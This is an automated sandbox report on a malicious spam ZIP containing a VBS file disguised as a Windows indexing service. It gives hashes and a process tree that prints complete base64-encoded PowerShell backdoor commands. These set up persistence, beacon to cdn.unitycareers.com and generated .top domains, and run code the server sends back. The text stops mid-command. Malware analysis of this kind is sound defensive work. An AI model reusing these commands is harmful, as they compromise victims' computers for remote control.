File name: | SPAM2.zip |
Full analysis: | https://app.any.run/tasks/23da2aa0-ca4c-4bf2-8334-ce4d42a21a64 |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 15:12:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 43587316F6B853333100BDC3665B41B0 |
SHA1: | 9FE38448709053E8A37CE09D42DE8BBD48ED35B6 |
SHA256: | 72C4EFCCFE2E5DB4431285670BB407AAEA3885F1AB7E3455BF84F54D9836C08B |
SSDEEP: | 768:SSNzKhUE0SVmdaWMQb6lYAZyas94SMsu3Kr6KPi9rh9xF1qyCGuJ3:rNGh/rsMKb6uAHs9TMsh6Kyrh9xF1BCV |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | WindowsIndexingService (2).vbs |
---|---|
ZipUncompressedSize: | 147104 |
ZipCompressedSize: | 7955 |
ZipCRC: | 0xbc4c1f04 |
ZipModifyDate: | 2019:10:09 17:11:14 |
ZipCompression: | Deflated |
ZipBitFlag: | - |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2648 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\SPAM2.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2140 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\WindowsIndexingService.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1876 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JGNpd2h0aHVpeCA9ICRlbnY6UFVCTElDICsgIlxMaWJyYXJpZXMiCmlmICgtbm90IChUZXN0LVBhdGggJGNpd2h0aHVpeCkpIHsgbWQgJGNpd2h0aHVpeDsgfQokc2RodWdheSA9ICRjaXdodGh1aXggKyAiXFdpbmRvd3NJbmRleGluZ1NlcnZpY2UudmJzIjsKJGl0aHN4Z2hnICA9ICIxMDA2LjEiOwokYmNqZWRpc2VmYiA9ICRlbnY6dGVtcCArICJcQUZYNTAwNTgudG1wIjsKJHVpaXNpamEgID0gJGNpd2h0aHVpeCArICJcdGh1bWJjYWNoZV82NC5kYiI7CiRteXVybHBvc3QgPSAkZmFsc2U7CiRianZndmp4YWEgPSAidyI7CgpmdW5jdGlvbiBpYW13b3JrMnsgc2MgLVBhdGggJGJjamVkaXNlZmIgLVZhbHVlICQoR2V0LURhdGUpOyB9OwpmdW5jdGlvbiBqdXl4Z2Z0KCAkYWJ3dXp2aWplaSApewogIGlmKCAkYWJ3dXp2aWplaSAtbWF0Y2ggJ091dE9mTWVtb3J5RXhjZXB0aW9uJyApewogICAgcmkgLVBhdGggJGJjamVkaXNlZmIgLUZvcmNlOwogICAgZ2V0LXByb2Nlc3MgcG93ZXJzaGVsbCogfCBzdG9wLXByb2Nlc3M7CiAgICBleGl0OwogIH07Cn0KCmZ1bmN0aW9uIHNlbmRwb3N0MiggJGFid3V6dmlqZWkgKXsKICBpZiggISRteXVybHBvc3QgKXsgcmV0dXJuICRmYWxzZTsgfTsKICAkZWF0endqY3kgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OwogICRlYXR6d2pjeS5DcmVkZW50aWFscyA9IFtTeXN0ZW0uTmV0LkNyZWRlbnRpYWxDYWNoZV06OkRlZmF1bHRDcmVkZW50aWFsczsKICAkZWF0endqY3kuSGVhZGVycy5BZGQoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsKICAkZWF0endqY3kuRW5jb2RpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4OwogIHRyeXsKICAgICRkYWNmdHl0YmIgPSAkZWF0endqY3kuVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSRpdGhzeGdoZyZndWlkPSR6dnppempkaSYiICsgJGFid3V6dmlqZWkgKSApICkgKTsKICAgICRkYWNmdHl0YmIgPSBbc3RyaW5nXVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCAkZGFjZnR5dGJiICkgKTsKICAgIGlmKCAhJGJqdmd2anhhYSApeyByZXR1cm4gJGZhbHNlOyB9CiAgICBpZiggJHV5and1Y2IgLWVxICRkYWNmdHl0YmIuU3Vic3RyaW5nKDAsMTYpICl7CiAgICAgIHJldHVybiAkZGFjZnR5dGJiLlN1YnN0cmluZygxNiwkZGFjZnR5dGJiLmxlbmd0aC0xNikgOwogICAgfWVsc2V7CiAgICAgICRianZndmp4YWEgPSAkZmFsc2U7CiAgICAgIHNlbmRwb3N0MiAoImVycm9yPSIgKyBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcyggJGRhY2Z0eXRiYiApICkgKTsKICAgIH0KICB9Y2F0Y2h7CiAgICBqdXl4Z2Z0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlOwogICAgJGJqdmd2anhhYSA9ICRmYWxzZTsKICAgICRlYXR6d2pjeS5VcGxvYWRTdHJpbmcoICRteXVybHBvc3QsICJsPSIrW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICggInY9JGl0aHN4Z2hnJmd1aWQ9JHp2eml6amRpJmVycm9yPXNlbmRwb3N0MjoiICsgJG15dXJscG9zdCsiOiIrJGRhY2Z0eXRiYiArIjoiKyAkXy5FeGNlcHRpb24uTWVzc2FnZSApICkgKSApOwogIH07CiAgcmV0dXJuICRmYWxzZTsKfTsKCmZ1bmN0aW9uIHh1amN0dHpkKCAkeGpndWFnaiApewogICRhamJ1enl2dSA9ICJodHRwOi8vY2RuLnVuaXR5Y2FyZWVycy5jb20vIjsKICAiaGVlIiwieHUxIiwiaHMwIiwiamQ1IiwibXFmIiB8ICV7ICRhamJ1enl2dSArPSAiLCIrImh0dHA6Ly8iKyAoIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICRfKyAkKEdldC1EYXRlIC1VRm9ybWF0ICIleSVtJVYiKSApICkudG9Mb3dlcigpICkgKyIudG9wLyI7IH07CiAgJGFqYnV6eXZ1LnNwbGl0KCIsIikgfCAlewogICAgaWYoICEkbXl1cmxwb3N0ICl7CiAgICAgICRteXVybHBvc3QgPSAkXzsKICAgICAgaWYoICEoc2VuZHBvc3QyICgkeGpndWFnaiArICImZG9tZW49JG15dXJscG9zdCIgKSkgKXsgJG15dXJscG9zdCA9ICRmYWxzZTsgfTsKICAgICAgU3RhcnQtU2xlZXAgLXMgNTsKICAgIH0KICB9OwogIGlmKCAkeGpndWFnaiAtbWF0Y2ggInN0YXR1cz1yZWdpc3RlciIgKXsKICAgIHJldHVybiAib2siOwogIH1lbHNlewogICAgcmV0dXJuICRteXVybHBvc3Q7CiAgfSAKfTsKCmlmICggVGVzdC1QYXRoICRiY2plZGlzZWZiICl7CiAgaWYgKCAoICggTkVXLVRJTUVTUEFOIC1TdGFydCAoKEdldC1DaGlsZEl0ZW0gJGJjamVkaXNlZmIgKS5DcmVhdGlvblRpbWUpIC1FbmQgKEdldC1EYXRlKSkuTWludXRlcyApIC1ndCAxNSApewogICAgcmkgLVBhdGggJGJjamVkaXNlZmIgLUZvcmNlOwogICAgdHJ5eyBnZXQtcHJvY2VzcyBwb3dlcnNoZWxsKiB8IHN0b3AtcHJvY2VzcyB9Y2F0Y2h7fTsKICAgIGV4aXQ7CiAgfWVsc2V7IGV4aXQ7IH07Cn07CgpmdW5jdGlvbiB1ZWZidmp2dGF0KCAkZXNqdmVoeHVmZiApewogIGlmKCAkZXNqdmVoeHVmZiApewogICAgc2MgLVBhdGggJHVpaXNpamEgLVZhbHVlICggW2d1aWRdOjpOZXdHdWlkKCksICggW2d1aWRdOjpOZXdHdWlkKCkgLXJlcGxhY2UgJy0nLCcnICkuU3Vic3RyaW5nKDAsMTYpICAtam9pbiAnLCcgKSAtRm9yY2U7ICAKICAgIGdpICR1aWlzaWphIC1Gb3JjZSB8ICAleyAkXy5BdHRyaWJ1dGVzID0gIkhpZGRlbiIgfTsKICAgIHRyeXsKICAgICAgJGp1dmp2YnhzYnkgPSBbRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdTdGFydHVwJykgKyAnXFdpbmRvd3NBcHBsaWNhdGlvblNlcnZpY2UubG5rJzsKICAgICAgaWYoIC1ub3QgKCBUZXN0LVBhdGggJGp1dmp2YnhzYnkgKSApewogICAgICAgICRpaWhkeGFoID0gTmV3LU9iamVjdCAtQ29tT2JqZWN0ICgnV1NjcmlwdC5TaGVsbCcpOwogICAgICAgICRqZHhic3p3YXhjID0gJGlpaGR4YWguQ3JlYXRlU2hvcnRjdXQoICRqdXZqdmJ4c2J5ICApOwogICAgICAgICRqZHhic3p3YXhjLlRhcmdldFBhdGggPSAkc2RodWdheTsKICAgICAgICAkamR4YnN6d2F4Yy5Xb3JraW5nRGlyZWN0b3J5ID0gJGNpd2h0aHVpeDsKICAgICAgICAkamR4YnN6d2F4Yy5XaW5kb3dTdHlsZSA9IDE7CiAgICAgICAgJGpkeGJzendheGMuRGVzY3JpcHRpb24gPSAnV2luZG93cyBBcHBsaWNhdGlvbiBTZXJ2aWNlJzsKICAgICAgICAkamR4YnN6d2F4Yy5TYXZlKCk7CiAgICAgIH0KICAgIH1jYXRjaHt9OwogICAgJHp2eml6amRpLCAkdXlqd3VjYiA9IChnZXQtY29udGVudCAkdWlpc2lqYSkuc3BsaXQoJywnKTsKICAgICRoZ3hldHV1c3V3ID0gInN0YXR1cz1yZWdpc3RlciZzc2lkPSR1eWp3dWNiJm9zPSIrKFtzdHJpbmddJFBTVmVyc2lvblRhYmxlLkJ1aWxkVmVyc2lvbikrIiZwc3Zlcj0iKyggKCAoR2V0LUhvc3QpLlZlcnNpb24gKS5NYWpvciApKyAiJmNvbXBfbmFtZT0iICsgKChHZXQtV21pT2JqZWN0IC1jbGFzcyBXaW4zMl9Db21wdXRlclN5c3RlbSAtUHJvcGVydHkgTmFtZSkuTmFtZS50cmltKCkgKTsKICAgIGlmKCBUZXN0LVBhdGggKCAkY2l3aHRodWl4ICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApICl7CiAgICAgIHJpIC1QYXRoICggJGNpd2h0aHVpeCArICJcdGh1bWJjYWNoZV8zMy5kYiIgKSwgKCAkY2l3aHRodWl4ICsgIlxXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmpzIiApIC1Gb3JjZTsKICAgICAgdHJ5eyBzY2h0YXNrcy5leGUgL2RlbGV0ZSAvVE4gIldpbmRvd3NJbmRleGluZ1NlcnZpY2UiIC9mIH1jYXRjaHt9CiAgICAgIHRyeXsgc2NodGFza3MuZXhlIC9kZWxldGUgL1ROICJXaW5kb3dzIEluZGV4aW5nIFNlcnZpY2UiIC9mIH1jYXRjaHt9CiAgICAgIGlmKCBUZXN0LVBhdGggKCBbRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdTdGFydHVwJykgKyAnXFdpbmRvd3NJbmRleGluZ1NlcnZpY2UubG5rJyApICApewogICAgICAgIHJpIC1QYXRoICggW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmxuaycgKSAtRm9yY2U7CiAgICAgIH0KICAgIH0KICAgICRjZGhheGdmY3lpID0geHVqY3R0emQgJGhneGV0dXVzdXc7CiAgICBpZiggJGNkaGF4Z2ZjeWkgLW5lICJvayIpewogICAgICByaSAtUGF0aCAkdWlpc2lqYSAtRm9yY2U7CiAgICAgIGV4aXQ7CiAgICB9CiAgfQogIHJldHVybiAoZ2V0LWNvbnRlbnQgJHVpaXNpamEpLnNwbGl0KCcsJyk7Cn0KJGNheHV0dnNheiA9IChzY2h0YXNrcy5leGUgL2NyZWF0ZSAvVE4gIldpbmRvd3NBcHBsaWNhdGlvblNlcnZpY2UiIC9zYyBEQUlMWSAvc3QgMDA6MDAgL2YgL1JJIDE3IC9kdSAyMzo1OSAvVFIgJHNkaHVnYXkpOyAKaWYgKCBUZXN0LVBhdGggJHVpaXNpamEgKXsKICAkenZ6aXpqZGksICR1eWp3dWNiID0gIHVlZmJ2anZ0YXQgJGZhbHNlOwogIGlmKCAkdXlqd3VjYi5sZW5ndGggLW5lIDE2ICApeyAkenZ6aXpqZGksICR1eWp3dWNiID0gIHVlZmJ2anZ0YXQgJHRydWU7IH0KfWVsc2V7CiAgJHp2eml6amRpLCAkdXlqd3VjYiA9ICB1ZWZidmp2dGF0ICR0cnVlOwp9CiRteXVybHBvc3QgPSB4dWpjdHR6ZDsKd2hpbGUoICRianZndmp4YWEgKXsKICBpYW13b3JrMjsKICB0cnl7CiAgICBpZiggJGJqdmd2anhhYSAtYW5kICgkYmp2Z3ZqeGFhLmxlbmd0aCAtZ3QgMzApICApewogICAgICBpZXggJGJqdmd2anhhYTsKICAgIH07CiAgfWNhdGNoeyBqdXl4Z2Z0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlOyB9OwogIFN0YXJ0LVNsZWVwIC1zIDI4MDsKICAkYmp2Z3ZqeGFhID0gc2VuZHBvc3QyOwp9OwpyaSAtUGF0aCAkYmNqZWRpc2VmYiAtRm9yY2U7Cg==' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1540 | "C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2100 | "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s | C:\Windows\system32\mmc.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Management Console Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2384 | "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s | C:\Windows\system32\mmc.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft Management Console Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1732 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\WindowsIndexingService (2).vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2296 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHplc3l6ZnkgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICR6ZXN5emZ5KSkgeyBtZCAkemVzeXpmeTsgfQokd3NmZmJ5Zmh2ID0gJHplc3l6ZnkgKyAiXFdpbmRvd3NJbmRleGluZ1NlcnZpY2UudmJzIjsKJGR6YXV4amh0aSAgPSAiMTAwNi4xIjsKJGRpYXZzZWFiID0gJGVudjp0ZW1wICsgIlxBRlg1MDA1OC50bXAiOwokd2ZhZXNjaSAgPSAkemVzeXpmeSArICJcdGh1bWJjYWNoZV82NC5kYiI7CiRteXVybHBvc3QgPSAkZmFsc2U7CiRjemVkd2Z6ID0gInciOwoKZnVuY3Rpb24gaWFtd29yazJ7IHNjIC1QYXRoICRkaWF2c2VhYiAtVmFsdWUgJChHZXQtRGF0ZSk7IH07CmZ1bmN0aW9uIGlkY3RkdXl2YiggJHh1Z2pjY2MgKXsKICBpZiggJHh1Z2pjY2MgLW1hdGNoICdPdXRPZk1lbW9yeUV4Y2VwdGlvbicgKXsKICAgIHJpIC1QYXRoICRkaWF2c2VhYiAtRm9yY2U7CiAgICBnZXQtcHJvY2VzcyBwb3dlcnNoZWxsKiB8IHN0b3AtcHJvY2VzczsKICAgIGV4aXQ7CiAgfTsKfQoKZnVuY3Rpb24gc2VuZHBvc3QyKCAkeHVnamNjYyApewogIGlmKCAhJG15dXJscG9zdCApeyByZXR1cm4gJGZhbHNlOyB9OwogICR5YWNhZ3V6ZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7CiAgJHlhY2FndXplLkNyZWRlbnRpYWxzID0gW1N5c3RlbS5OZXQuQ3JlZGVudGlhbENhY2hlXTo6RGVmYXVsdENyZWRlbnRpYWxzOwogICR5YWNhZ3V6ZS5IZWFkZXJzLkFkZCgiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIpOwogICR5YWNhZ3V6ZS5FbmNvZGluZyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjg7CiAgdHJ5ewogICAgJHV5emlzemQgPSAkeWFjYWd1emUuVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSRkemF1eGpodGkmZ3VpZD0kdHl3Z3R6Y2EmIiArICR4dWdqY2NjICkgKSApICk7CiAgICAkdXl6aXN6ZCA9IFtzdHJpbmddW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoICR1eXppc3pkICkgKTsKICAgIGlmKCAhJGN6ZWR3ZnogKXsgcmV0dXJuICRmYWxzZTsgfQogICAgaWYoICRmYWp0dWp6c2F5IC1lcSAkdXl6aXN6ZC5TdWJzdHJpbmcoMCwxNikgKXsKICAgICAgcmV0dXJuICR1eXppc3pkLlN1YnN0cmluZygxNiwkdXl6aXN6ZC5sZW5ndGgtMTYpIDsKICAgIH1lbHNlewogICAgICAkY3plZHdmeiA9ICRmYWxzZTsKICAgICAgc2VuZHBvc3QyICgiZXJyb3I9IiArIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkdXl6aXN6ZCApICkgKTsKICAgIH0KICB9Y2F0Y2h7CiAgICBpZGN0ZHV5dmIgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7CiAgICAkY3plZHdmeiA9ICRmYWxzZTsKICAgICR5YWNhZ3V6ZS5VcGxvYWRTdHJpbmcoICRteXVybHBvc3QsICJsPSIrW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICggInY9JGR6YXV4amh0aSZndWlkPSR0eXdndHpjYSZlcnJvcj1zZW5kcG9zdDI6IiArICRteXVybHBvc3QrIjoiKyR1eXppc3pkICsiOiIrICRfLkV4Y2VwdGlvbi5NZXNzYWdlICkgKSApICk7CiAgfTsKICByZXR1cm4gJGZhbHNlOwp9OwoKZnVuY3Rpb24genZ1ZHp3c2p0KCAkYWRodGh1amFlICl7CiAgJHlnamJoaGVqd3ogPSAiaHR0cDovL2Nkbi51bml0eWNhcmVlcnMuY29tLyI7CiAgImhlZSIsInh1MSIsImhzMCIsImpkNSIsIm1xZiIgfCAleyAkeWdqYmhoZWp3eiArPSAiLCIrImh0dHA6Ly8iKyAoIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICRfKyAkKEdldC1EYXRlIC1VRm9ybWF0ICIleSVtJVYiKSApICkudG9Mb3dlcigpICkgKyIudG9wLyI7IH07CiAgJHlnamJoaGVqd3ouc3BsaXQoIiwiKSB8ICV7CiAgICBpZiggISRteXVybHBvc3QgKXsKICAgICAgJG15dXJscG9zdCA9ICRfOwogICAgICBpZiggIShzZW5kcG9zdDIgKCRhZGh0aHVqYWUgKyAiJmRvbWVuPSRteXVybHBvc3QiICkpICl7ICRteXVybHBvc3QgPSAkZmFsc2U7IH07CiAgICAgIFN0YXJ0LVNsZWVwIC1zIDU7CiAgICB9CiAgfTsKICBpZiggJGFkaHRodWphZSAtbWF0Y2ggInN0YXR1cz1yZWdpc3RlciIgKXsKICAgIHJldHVybiAib2siOwogIH1lbHNlewogICAgcmV0dXJuICRteXVybHBvc3Q7CiAgfSAKfTsKCmlmICggVGVzdC1QYXRoICRkaWF2c2VhYiApewogIGlmICggKCAoIE5FVy1USU1FU1BBTiAtU3RhcnQgKChHZXQtQ2hpbGRJdGVtICRkaWF2c2VhYiApLkNyZWF0aW9uVGltZSkgLUVuZCAoR2V0LURhdGUpKS5NaW51dGVzICkgLWd0IDE1ICl7CiAgICByaSAtUGF0aCAkZGlhdnNlYWIgLUZvcmNlOwogICAgdHJ5eyBnZXQtcHJvY2VzcyBwb3dlcnNoZWxsKiB8IHN0b3AtcHJvY2VzcyB9Y2F0Y2h7fTsKICAgIGV4aXQ7CiAgfWVsc2V7IGV4aXQ7IH07Cn07CgpmdW5jdGlvbiBzdnZ5d2J3d2V5KCAkZ2F5ZXp2ZWliICl7CiAgaWYoICRnYXllenZlaWIgKXsKICAgIHNjIC1QYXRoICR3ZmFlc2NpIC1WYWx1ZSAoIFtndWlkXTo6TmV3R3VpZCgpLCAoIFtndWlkXTo6TmV3R3VpZCgpIC1yZXBsYWNlICctJywnJyApLlN1YnN0cmluZygwLDE2KSAgLWpvaW4gJywnICkgLUZvcmNlOyAgCiAgICBnaSAkd2ZhZXNjaSAtRm9yY2UgfCAgJXsgJF8uQXR0cmlidXRlcyA9ICJIaWRkZW4iIH07CiAgICB0cnl7CiAgICAgICRmYmNidmJoYiA9IFtFbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ1N0YXJ0dXAnKSArICdcV2luZG93c0FwcGxpY2F0aW9uU2VydmljZS5sbmsnOwogICAgICBpZiggLW5vdCAoIFRlc3QtUGF0aCAkZmJjYnZiaGIgKSApewogICAgICAgICRidGFkdXR2amIgPSBOZXctT2JqZWN0IC1Db21PYmplY3QgKCdXU2NyaXB0LlNoZWxsJyk7CiAgICAgICAgJHljaGFlYmkgPSAkYnRhZHV0dmpiLkNyZWF0ZVNob3J0Y3V0KCAkZmJjYnZiaGIgICk7CiAgICAgICAgJHljaGFlYmkuVGFyZ2V0UGF0aCA9ICR3c2ZmYnlmaHY7CiAgICAgICAgJHljaGFlYmkuV29ya2luZ0RpcmVjdG9yeSA9ICR6ZXN5emZ5OwogICAgICAgICR5Y2hhZWJpLldpbmRvd1N0eWxlID0gMTsKICAgICAgICAkeWNoYWViaS5EZXNjcmlwdGlvbiA9ICdXaW5kb3dzIEFwcGxpY2F0aW9uIFNlcnZpY2UnOwogICAgICAgICR5Y2hhZWJpLlNhdmUoKTsKICAgICAgfQogICAgfWNhdGNoe307CiAgICAkdHl3Z3R6Y2EsICRmYWp0dWp6c2F5ID0gKGdldC1jb250ZW50ICR3ZmFlc2NpKS5zcGxpdCgnLCcpOwogICAgJGdhZGJ3ZXp0YiA9ICJzdGF0dXM9cmVnaXN0ZXImc3NpZD0kZmFqdHVqenNheSZvcz0iKyhbc3RyaW5nXSRQU1ZlcnNpb25UYWJsZS5CdWlsZFZlcnNpb24pKyImcHN2ZXI9IisoICggKEdldC1Ib3N0KS5WZXJzaW9uICkuTWFqb3IgKSsgIiZjb21wX25hbWU9IiArICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE5hbWUpLk5hbWUudHJpbSgpICk7CiAgICBpZiggVGVzdC1QYXRoICggJHplc3l6ZnkgKyAiXHRodW1iY2FjaGVfMzMuZGIiICkgKXsKICAgICAgcmkgLVBhdGggKCAkemVzeXpmeSArICJcdGh1bWJjYWNoZV8zMy5kYiIgKSwgKCAkemVzeXpmeSArICJcV2luZG93c0luZGV4aW5nU2VydmljZS5qcyIgKSAtRm9yY2U7CiAgICAgIHRyeXsgc2NodGFza3MuZXhlIC9kZWxldGUgL1ROICJXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93cyBJbmRleGluZyBTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICBpZiggVGVzdC1QYXRoICggW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmxuaycgKSAgKXsKICAgICAgICByaSAtUGF0aCAoIFtFbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ1N0YXJ0dXAnKSArICdcV2luZG93c0luZGV4aW5nU2VydmljZS5sbmsnICkgLUZvcmNlOwogICAgICB9CiAgICB9CiAgICAkYWlidXRieXp3ID0genZ1ZHp3c2p0ICRnYWRid2V6dGI7CiAgICBpZiggJGFpYnV0Ynl6dyAtbmUgIm9rIil7CiAgICAgIHJpIC1QYXRoICR3ZmFlc2NpIC1Gb3JjZTsKICAgICAgZXhpdDsKICAgIH0KICB9CiAgcmV0dXJuIChnZXQtY29udGVudCAkd2ZhZXNjaSkuc3BsaXQoJywnKTsKfQokemlpYmNmZGJ2YyA9IChzY2h0YXNrcy5leGUgL2NyZWF0ZSAvVE4gIldpbmRvd3NBcHBsaWNhdGlvblNlcnZpY2UiIC9zYyBEQUlMWSAvc3QgMDA6MDAgL2YgL1JJIDE0IC9kdSAyMzo1OSAvVFIgJHdzZmZieWZodik7IAppZiAoIFRlc3QtUGF0aCAkd2ZhZXNjaSApewogICR0eXdndHpjYSwgJGZhanR1anpzYXkgPSAgc3Z2eXdid3dleSAkZmFsc2U7CiAgaWYoICRmYWp0dWp6c2F5Lmxlbmd0aCAtbmUgMTYgICl7ICR0eXdndHpjYSwgJGZhanR1anpzYXkgPSAgc3Z2eXdid3dleSAkdHJ1ZTsgfQp9ZWxzZXsKICAkdHl3Z3R6Y2EsICRmYWp0dWp6c2F5ID0gIHN2dnl3Ynd3ZXkgJHRydWU7Cn0KJG15dXJscG9zdCA9IHp2dWR6d3NqdDsKd2hpbGUoICRjemVkd2Z6ICl7CiAgaWFtd29yazI7CiAgdHJ5ewogICAgaWYoICRjemVkd2Z6IC1hbmQgKCRjemVkd2Z6Lmxlbmd0aCAtZ3QgMzApICApewogICAgICBpZXggJGN6ZWR3Zno7CiAgICB9OwogIH1jYXRjaHsgaWRjdGR1eXZiICRfLkV4Y2VwdGlvbi5NZXNzYWdlOyB9OwogIFN0YXJ0LVNsZWVwIC1zIDI4MDsKICAkY3plZHdmeiA9IHNlbmRwb3N0MjsKfTsKcmkgLVBhdGggJGRpYXZzZWFiIC1Gb3JjZTsK' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1540 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\WindowsIndexingService (3).vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1856 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 